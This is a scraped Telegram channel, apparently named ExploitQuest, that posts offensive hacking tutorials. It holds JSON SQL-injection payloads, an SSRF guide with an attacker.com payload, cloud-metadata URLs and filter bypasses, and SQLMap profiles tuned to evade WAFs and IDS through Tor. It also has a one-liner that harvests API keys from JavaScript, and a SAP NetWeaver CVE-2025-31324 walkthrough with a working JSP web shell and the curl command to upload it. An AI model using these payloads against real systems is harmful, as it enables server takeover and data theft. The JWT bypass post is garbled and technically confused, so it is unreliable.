ExploitQuest

أهلاً وسهلاً بكم جميعاً،
هذه مجموعة من القنوات الخاصة بنا والتي قد تفيدكم خلال رحلتكم في المجال التقني وخاصةً في الأمن السيبراني.

https://t.me/addlist/nD70sWRf83U4ZTA0

Meow ~ Onion

s4rrar invites you to add the folder “Meow ~ Onion”, which includes 10 chats.

5.71K views18:15

ExploitQuest

https://t.me/iiElite

NaN Value

- For educational purposes only.
- @nanvalue

3.81K views22:53

ExploitQuest

https://t.me/GitBook_s

Bug Bounty - GitBook

GitBooks, Notion, medium, Mindmaps, books
bug bounty, pentest, ctf, osint, labs, tools
writeUps, check list, Cheatsheet, tips, GitHub

3.58K views05:49

ExploitQuest

A Real-World Example of Prototype Pollution Exploitation A hacker was testing a target and noticed that it didn’t properly validate user inputs, allowing multiple XSS vulnerabilities. This led them to wonder if they could directly manipulate the Prototype…

💻

Advanced Guide to SQL Injection in APIs and JSON Endpoints

🧠 Introduction
In the modern web, APIs are everywhere — powering everything from web apps and mobile apps to IoT devices. However, developers often make the same classic mistakes when handling user input, especially in JSON-based RESTful APIs.

SQL Injection (SQLi), a well-known vulnerability, is still relevant and can exist within APIs if input validation and query handling are not properly secured.

This article explores advanced techniques for identifying and exploiting SQL injection in APIs, particularly in JSON payloads. It is tailored for penetration testers and bug bounty hunters seeking to level up their API testing game.

━━━━━━━━━━━━━━━

🔎

Finding SQLi in JSON APIs

📍

Where to Look

•POST requests with JSON bodies

•GraphQL endpoints

•PUT/PATCH methods with nested objects

•Endpoints with dynamic filters or search queries

🔍

Signs of Vulnerability

•Database-related error messages in API responses

•Unusual delays in response (time-based blind SQL)

•Reflection of user input in responses or logs

•Status code anomalies (e.g., 500 Internal Server Error)

━━━━━━━━━━━━━━━

🤡

Exploiting SQLi in JSON Payloads

Let’s say you’re testing the following API

POST /api/user/details HTTP/1.1
Host: vulnerable.site
Content-Type: application/json

{
  "username": "admin"
}

Try payload injection:

{
  "username": "' OR '1'='1"
}

🤖Or blind time-based:

{
  "username": "' OR SLEEP(5)--"
}

🤜

If the server response is delayed by 5 seconds, you’ve got a time-based blind SQLi.

🧪

Example Using curl

curl -X POST https://vulnerable.site/api/user/details \
  -H "Content-Type: application/json" \
  -d '{"username": "' OR 1=1 --"}'

🤜

Another JSON structure:

{
  "filter": {
    "email": "admin@site.com' OR '1'='1"
  }
}

Or nested objects:


{
  "user": {
    "id": "1'; DROP TABLE users;--"
  }
}

🔏

Tools You Can Use

•Burp Suite (Pro): Use the Intruder or Repeater to fuzz JSON payloads.

•SQLMap with --data and --json flags:

sqlmap -u https://vulnerable.site/api/login \
  --data '{"user":"admin","pass":"pass"}' \
--headers="Content-Type: application/json" \
  --level=5 --risk=3 --batch

•Postman: Manual testing and injection

•Nuclei with custom templates

━━━━━━━━━━━━━━━━━━

🧠 Tips for Advanced Hunters
Always analyze API docs (Swagger/OpenAPI) for parameter hints.

•Use Burp Collaborator for detecting out-of-band SQLi.

•Test for second-order injection, especially in multi-step flows.

•Try JSON-specific encoding, like:

•Unicode: \u0027 OR \u0031=\u0031

•Base64 in API params

━━━━━━━━━━━━━━━━━━

🛡️ Mitigation (For Blue Team Awareness)
Use parameterized queries / prepared statements

•Sanitize and validate input rigorously

•Apply WAF rules and anomaly detection for API behavior

•Implement rate limiting and access control

━━━━━━━━━━━━━━━━━━

😎Final Thoughts
SQL Injection is far from dead — it's just evolving. Modern APIs, especially those handling complex JSON bodies, often become attack vectors due to developer assumptions or insecure ORM usage. With the right mindset, tools, and techniques, ethical hackers can uncover and responsibly disclose serious vulnerabilities before attackers do.

🔡That's all, friends!
Happy hacking and see you next time!

🎁

#CyberSecurity #MSSQL #EthicalHacking #json
#api
#JavaScriptSecurity
#WebSecurity
#BugBounty #EthicalHacking #CyberSecurity
#SecurityResearch #WebHacking

Please open Telegram to view this post

VIEW IN TELEGRAM

❤9👍2🥰1

3.24K viewsedited 07:38

ExploitQuest

😠

Please open Telegram to view this post

VIEW IN TELEGRAM

❤6🤣4😁3😢1

2.57K views07:48

ExploitQuest

🕷️ Mastering SSRF: A Step-by-Step Guide to Finding and Exploiting Server-Side Request Forgery

Server-Side Request Forgery (SSRF) is a powerful vulnerability that occurs when a server fetches external resources based on user input. If exploited, it can lead to data leakage, access to internal systems, or even full infrastructure compromise.

Here’s a step-by-step guide to discovering and exploiting SSRF vulnerabilities:

━━━━━━━━━━━━━━━━━━

🔍 1. Identify Entry Points
Start by locating areas where the application sends outbound requests. Common sources include:

🔘Link previews

🔘File upload/download functionalities

🔘Webhooks

🔘PDF or image generation

🔘URL fetchers for screenshots or validators

If HTML or external content is processed, injecting a malicious URL can trick the server into making a request to your controlled endpoint.

Example:

<img src="http://attacker.com/payload"/>

━━━━━━━━━━━━━━━━━━

🧪

2. Analyze Error Responses
Test the server’s behavior by sending malformed URLs and observe the error responses:

🔘Connection refused

🔘Invalid hostname

🔘HTTP status codes like 403, 404, 500

These clues indicate whether the server is trying to make external requests.

Test Payloads:

http://invalid-url
http://example.local
http://127.0.0.1:9999

━━━━━━━━━━━━━━━━━━

🏠 3. Target Internal Resources
Once confirmed, aim for internal IP ranges such as:

🔘127.0.0.1

🔘10.x.x.x

🔘192.168.x.x

These often expose admin panels, internal APIs, or development services. Port scanning via SSRF is also possible by analyzing different response behaviors.

Example:

http://127.0.0.1:8000/admin

━━━━━━━━━━━━━━━━━━

😈

4. Access Cloud Metadata Services
In cloud environments (AWS, Azure, GCP), internal metadata endpoints may leak sensitive info like access keys and tokens.

Payloads:

🔘AWS:

http://169.254.169.254/latest/meta-data

🔘Azure:

http://169.254.169.254/metadata/instance?api-version=2021-02-01

Be sure to include necessary headers if required (e.g., Metadata: true for Azure).

━━━━━━━━━━━━━━━━━━

😀

5. Bypass Filters and WAFs
If filters are in place, use bypass techniques:

🔘URL encoding:

http://127%2E0%2E0%2E1

🔘Decimal IP:

http://2130706433 (equals 127.0.0.1)

🔘IPv6 format:

http://[::]

🔘Use redirections through open servers

Pro Tip: Use DNS rebinding or SSRF chaining with redirect-capable endpoints.

━━━━━━━━━━━━━━━━━━

👁

6. Exploit Blind SSRF
In blind SSRF cases, you won’t get visible feedback. Use external monitoring tools to detect interactions:

🔘Burp Collaborator

🔘Webhook.site

🔘Custom DNS loggers

Example:

http://your-collaborator-url.com

Monitor for DNS or HTTP logs to confirm server-side interaction.

━━━━━━━━━━━━━━━━━━

🎃

Conclusion: SSRF attacks may be subtle but extremely dangerous. Through careful inspection, intelligent payload design, and out-of-band detection, you can uncover hidden internal networks and access sensitive information.

That's all, friends!
Happy hacking and see you next time!🎁

#BugBounty
#ssrf
#sqli
#bypass

Please open Telegram to view this post

VIEW IN TELEGRAM

Attacker

Attacker - The Domain Name Attacker.com is Now For Sale.

Attacker.com is now for sale, lease or rent. Smart domain names compound conversion rates and this domain name for Attacker marketing is a wise investment.

🔥5❤3👍1🥰1

2.55K views08:59

ExploitQuest

Here’s a powerful list of 💻 SQLMap preconfigured profiles you can use for stealthy SQL injection, especially when dealing with WAFs, rate-limits, or intrusion detection systems (IDS/IPS).

These profiles combine SQLMap's most effective flags for stealth, evasion, and precision targeting.

✅ 1. Stealth Mode (WAF Bypass + Delay)

sqlmap -u "http://target.com/page.php?id=1" \
--random-agent \
--tamper=space2comment,between,charunicodeescape \
--delay=2 --timeout=10 \
--retries=5 \
--threads=1 \
--technique=BEUSTQ \
--level=3 --risk=2

🔘 Use Case: Slow, stealthy testing to avoid WAF/IPS.

━━━━━━━━━━━━━━━━━━

✅ 2. Aggressive Mode with WAF Evasion

sqlmap -u "http://target.com/page.php?id=1" \
--random-agent \
--tamper=space2comment,charencode,unmagicquotes,versionedmorekeywords \
--level=5 --risk=3 \
--batch --threads=5 \
--technique=BEUSTQ

🔘 Use Case: For deeper exploitation when stealth is less critical.

━━━━━━━━━━━━━━━━━━

✅

3. Blind Time-Based SQLi Detection

sqlmap -u "http://target.com/page.php?id=1" \
--random-agent \
--tamper=space2comment,modsecurityversioned,between \
--technique=T \
--time-sec=5 \
--level=5 --risk=3 \
--batch

🔘 Use Case: For blind injections using SLEEP, benchmark, or pg_sleep.

━━━━━━━━━━━━━━━━━━

✅ 4. Obfuscated Payloads for Bypassing WAFs

sqlmap -u "http://target.com/page.php?id=1" \
--tamper=charunicodeescape,randomcase,space2comment,versionedkeywords \
--random-agent \
--level=5 --risk=3 \
--threads=1 --delay=1 \
--batch

🔘 Use Case: When facing intelligent WAFs that detect classic patterns.

━━━━━━━━━━━━━━━━━━

✅ 5. POST Parameter Injection with Custom Headers

sqlmap -u "http://target.com/login.php" \
--data="username=admin&password=1234" \
--method=POST \
--headers="X-Forwarded-For: 127.0.0.1" \
--random-agent \
--tamper=space2comment,charunicodeescape \
--level=5 --risk=3 \
--batch

🔘 Use Case: Bypassing login forms and tricking WAFs using header spoofing.

━━━━━━━━━━━━━━━━━━

✅ 6. Using TOR with WAF Evasion

sqlmap -u "http://target.com/page.php?id=1" \
--tor --tor-type=SOCKS5 --check-tor \
--random-agent \
--delay=2 --timeout=10 \
--tamper=space2comment,charunicodeescape,modsecurityversioned \
--batch

🔘 Use Case: Anonymous testing through TOR while bypassing WAF.

━━━━━━━━━━━━━━━━━━

🔧 Recommended Tamper Scripts

| Tamper Script | Description
| ---------------------- | -------------------------------------------
| `space2comment` | Replaces spaces with comments (`/**/`)
| `charunicodeescape` | Unicode-escapes payload characters
| `randomcase` | Randomizes keyword casing
| `between` | Obfuscates `WHERE` conditions
| `versionedkeywords` | Adds versioned comments before SQL keywords
| `equaltolike` | Replaces `=` with `LIKE`
| `unmagicquotes` | Bypasses magic quotes
| `modsecurityversioned` | Targets ModSecurity WAF bypass

💡 Bonus: Create a Custom Profile Alias
You can create a .sqlmap_profile file to reuse flags:

# ~/.sqlmap_profile
--random-agent
--tamper=space2comment,charunicodeescape
--level=5
--risk=3
--threads=1
--delay=1
--timeout=10
--retries=3
--technique=BEUSTQ

Then run:

sqlmap -u "http://target.com/page.php?id=1" @~/.sqlmap_profile

That's all, friends!
Happy hacking and see you next time!🎁

#BugBounty
#ssrf
#sqli
#bypass

Please open Telegram to view this post

VIEW IN TELEGRAM

❤11🔥4🥰1

3.14K viewsedited 02:58

ExploitQuest

🧑‍🚀 Using wget for Bug Bounty Recon

📥 Download a full offline copy of a target website with this powerful one-liner:

wget --mirror --convert-links --adjust-extension --page-requisites --no-parent http://target.com

🧠 Why it's useful for Bug Bounty hunters:

Analyze JavaScript files for hidden secrets, tokens, or API endpoints 🔒

Discover hidden or forgotten pages like /admin, /test, etc. 🕵️

Search HTML comments for sensitive dev notes 📄

Browse and inspect the full site locally without triggering WAFs or rate limits 🚫

📎 Handy commands:

grep -Ri "<!--" target.com         
# Developer comments
grep -Ri "api" target.com          
# API endpoints
python3 LinkFinder.py -i index.html -o cli

That's all, friends!
Happy hacking and see you next time!🎁

#BugBounty
#ssrf
#sqli
#bypass
#wget

Please open Telegram to view this post

VIEW IN TELEGRAM

Target

Target : Expect More. Pay Less.

Shop Target online and in-store for everything from groceries and essentials to clothing and electronics. Choose contactless pickup or delivery today.

🔥4❤2🥰2

3.56K views19:25

ExploitQuest

soon

🤖

Please open Telegram to view this post

VIEW IN TELEGRAM

Please open Telegram to view this post

VIEW IN TELEGRAM

🔥5❤2

4.11K views20:02

ExploitQuest

lol What is this speed? 😂

👍

Please open Telegram to view this post

VIEW IN TELEGRAM

Please open Telegram to view this post

VIEW IN TELEGRAM

❤10🥰2

3.86K views20:18

ExploitQuest

❖ API Authentication Bypass

Let's assume we have a vulnerable API endpoint: https://example.com/api/v1/users

The API uses JSON Web Tokens (JWT) for authentication. We can use a tool like Burp Suite to intercept and manipulate the JWT token.

Step 1: Intercept JWT Token

Using Burp Suite, intercept the login request and capture the JWT token:

GET /api/v1/login HTTP/1.1
Host: example.com
Content-Type: application/json

{"username": "user", "password": "pass"}

Response:

HTTP/1.1 200 OK
Content-Type: application/json

{"token": "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaGFuIjoiMjMwfQ.SflKxwRJSMeKKF2QT4fwpMeJf36POk6yJV_adQssw5c"}

Step 2: Analyze JWT Token

Using a tool like jwt.io, we can analyze the JWT token and find the algorithm used (HS256) and the payload:

{
  "sub": "1234567890",
  "name": "John Doe",
  "iat": 1643723900,
  "exp": 1644329700
}

Step 3: Bypass Authentication

We can use a tool like jwt_tool to generate a new JWT token with the same payload but with a longer expiration time (e.g., 1 year):

jwt_tool --alg HS256 --payload '{"sub": "1234567890", "name": "John Doe", "iat": 1643723900, "exp": 2147483647}' --secret-key 'your_secret_key_here'

This will generate a new JWT token with a longer expiration time. We can use this token to bypass authentication:

GET /api/v1/users HTTP/1.1
Host: example.com
Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaGFuIjoiMjMwfQ.SflKxwRJSMeKKF2QT4fwpMeJf36POk6yJV_adQssw5c

PoC Code

import jwt

# Load secret key
with open('secret_key.txt', 'r') as f:
    secret_key = f.read().strip()

# Generate new JWT token with longer expiration time
payload = {'sub': '1234567890', 'name': 'John Doe', 'iat': 1643723900, 'exp': 2147483647}
new_token = jwt.encode(payload, secret_key, algorithm='HS256')

# Use new token to bypass authentication
headers = {'Authorization': f'Bearer {new_token.decode()}'}
response = requests.get('https://example.com/api/v1/users', headers=headers)
print(response.text)

Note: This is just a basic example and should not be used in production. In a real-world scenario, you should use a more sophisticated approach to bypass authentication.

That's all, friends!
Happy hacking and see you next time!🎁

#BugBounty
#ssrf
#sqli
#bypass
#wget #api

❤15🔥5🥰5👏1

5.58K viewsedited 19:31

ExploitQuest

Photo

You can try the bot now. Note: Model Chat GPT is not working now.

🤖

@DarkHunterAIbot

Please open Telegram to view this post

VIEW IN TELEGRAM

❤6

5.2K views20:02

ExploitQuest

🔍 Recon Command for Bug Bounty Hunters

This command extracts all JavaScript files from a given target using getJS, then downloads and scans them for sensitive keywords such as apikey, token, or secret.

🎯 Why it's useful in Bug Bounty:
JavaScript files often contain hidden endpoints, API keys, tokens, or sensitive configuration data. This command helps bug bounty hunters automate the discovery of potential security misconfigurations or leaked secrets exposed in frontend code.

getJS --url https://target.com | xargs -I@ curl -s @ | grep -Ei 'apikey|token|secret'

Please open Telegram to view this post

VIEW IN TELEGRAM

Target

Target : Expect More. Pay Less.

Shop Target online and in-store for everything from groceries and essentials to clothing and electronics. Choose contactless pickup or delivery today.

❤31

5.32K viewsedited 01:05

ExploitQuest

Zero-Day Vulnerability CVE-2025-31324 in SAP NetWeaver Platform: A Critical Analysis 🔓💥

The CVE-2025-31324 vulnerability in the SAP NetWeaver platform is a critical zero-day vulnerability that allows for unauthenticated Remote Code Execution (RCE). It is exploited by targeting a weakness in the Metadata Uploader feature of the Visual Composer component. 🎯

1. What is SAP NetWeaver? 🤔

The SAP NetWeaver platform is an integrated technology architecture produced by SAP SE. It serves as the foundation for building and operating enterprise business applications. It combines database management, application runtime, system integration, service development, and user interface functions into a single system. It provides tools for integrating applications and information across different environments and systems. 💻

The NetWeaver platform is the heart of modern SAP systems and enables:

🔘

Running applications like ERP, CRM, and BI on a single server with full flexibility.

🔘

Connecting various internal and external applications and systems within an enterprise (Integration).

🔘

Developing and deploying web applications and smart services using Java and ABAP.

🔘

Managing business processes and data through central portals and secure integration.

In short, it is a technical platform for running, developing, and integrating major business applications in enterprises, forming the backbone of the SAP ecosystem for companies worldwide. 🤔

2. How Attackers Find Vulnerable Systems

😣

Attackers locate affected SAP NetWeaver platforms using various network scanning and information gathering techniques and tools, the most important of which are:

🔘Using specialized search engines for devices and services (like Shodan, Censys):

🔘They search using specific keywords (dorks) or signatures that reveal the presence of exposed SAP NetWeaver interfaces on the internet.

🔘Example Searches:

http.title:"SAP NetWeaver Application Server"

🔘Searching within domains of large companies or government institution addresses.

🔘Scanning common SAP ports: 🚪

🔘SAP NetWeaver platforms are often available on specific ports like 50000, 50013, 8000, 8080, etc.

🔘Tools like nmap can scan these ports and find exposed systems.

🔘Using vulnerability and endpoint detection tools:

🔘Scanners like those from Onapsis, or even open-source tools like Metasploit modules, can identify the metadatauploader endpoint or the open Visual Composer page.

🔘Analyzing evidence from certificates or HTTP headers:

🔘Sometimes, HTTP headers or even digital certificates reveal the server version and identity.

🔘Leaked information or internet directories:

🔘Some directories or data leaks may provide addresses of exposed SAP systems or weak/default passwords.

3. Detailed Vulnerability Explanation 🧐

Affected Component: SAP NetWeaver Application Server Java, Visual Composer module.

Exploitation Method: The problem lies in a Missing Authorization Check 🔓 at the /developmentserver/metadatauploader endpoint, which allows attackers to send POST requests containing malicious files (like a Web Shell, JAR, or ZIP applications).

What happens during exploitation: The system accepts the file upload without properly verifying the user's authorization or checking the file securely, leading to the possibility of executing malicious code and gaining full control of the server (RCE) remotely.

Severity Level: CVSS 10/10 (CRITICAL) 💀, as attackers can gain full control of the system, steal sensitive data, or disrupt critical business systems.

4. Impact and Attack Targets 🎯

Please open Telegram to view this post

VIEW IN TELEGRAM

❤8

3.09K views01:00

ExploitQuest

Wide Spread: There are over 1200 SAP NetWeaver systems exposed to the internet worldwide that are at risk. ✔️

Exploitation Examples:

🔘Uploading a malicious Web Shell to the folder

j2ee/cluster/apps/sap.com/irj/servlet_jsp/irj/root/

and then accessing it to execute commands via GET requests.

🔘Stealing sensitive customer or financial data.

🔘Disrupting business activities.

Lateral movement within the network and compromising other systems.

Attack Workflow: ⚙️

1.The attacker prepares a malicious file (e.g., a Web Shell, a JAR or ZIP file embedded with malicious code).

2.They send this file as part of an HTTP POST request to a path like:

/irj/servlet/prt/portal/prtroot/com.sap.visualcomposer.dev.server.metadatauploader

3.The SAP NetWeaver server, due to the missing authorization check, accepts the file and stores/executes it as part of its system.

4.The attacker then follows up with an HTTP GET request to the Web Shell file (or executes Java code or other code), beginning their full control over the system.

5.The attacker can now execute any commands, steal data, or move laterally within the network.

5. Tools Used for Sending POST Requests 🛠

Attackers use specialized tools that allow them to formulate and send HTTP requests manually or automatically. The most famous tools used are:

curl

🔘A command-line tool available on Linux (and all major systems) that allows sending custom HTTP/HTTPS requests.

🔘Example usage:

curl -k -X POST -F "file=@webshell.jsp" https://target-sap-server/metadatauploader

Burp Suite 💼

🔘An advanced penetration testing tool that allows the attacker or security tester to intercept, examine, and modify any HTTP request (GET/POST).

🔘They can modify requests directly through the UI or use tools like Repeater/Intruder to send multiple different requests and observe responses.

🔘Postman

🔘A comprehensive application for sending HTTP requests and API development. It allows sending files, modifying fields and headers, and analyzing responses.

🔘Often used for manual testing to see the response and repeat requests.

🔘Custom Scripts in Python/JavaScript

🔘An advanced attacker might write a custom script using libraries like requests (Python) or axios (JavaScript) to send automated POST requests according to their attack scenario.

6. Technical Steps for Exploitation (For Study & Understanding Only) ⚠️

Warning: These steps are shown for educational and awareness purposes only, and not for actual illegal application.

1. Prepare a Malicious File
The file could be a Web Shell in JSP, for example:

<% if (request.getParameter("cmd") != null) {
    String cmd = request.getParameter("cmd");
    Process p = Runtime.getRuntime().exec(cmd);
    java.io.InputStream in = p.getInputStream();
    int a = -1;
    while((a=in.read())!=-1){
        out.print((char)a);
    }
    in.close();
} %>

2. Send a POST Request to Upload the File
Using a tool like curl:

curl -k -X POST \
 -F "file=@webshell.jsp" \
 https://target-sap-server/irj/servlet/prt/portal/prtroot/com.sap.visualcomposer.dev.server.metadatauploader

3. Access the File After Upload
Visit the path where the file is stored (example):

https://target-sap-server/irj/go/km/docs/webshell.jsp?cmd=whoami

The command will be executed and the result returned on the page, confirming that the attacker has gained full control of the server. 🎯

Disclaimer: This information is provided for educational and awareness purposes only. Unauthorized testing or exploitation of systems you do not own is illegal. 🚫

That's all, friends!
Happy hacking and see you next time!🎁

#BugBounty #ssrf
#sqli #bypass
#api

Please open Telegram to view this post

VIEW IN TELEGRAM

❤25

4K views01:00

About

Blog

Apps

Platform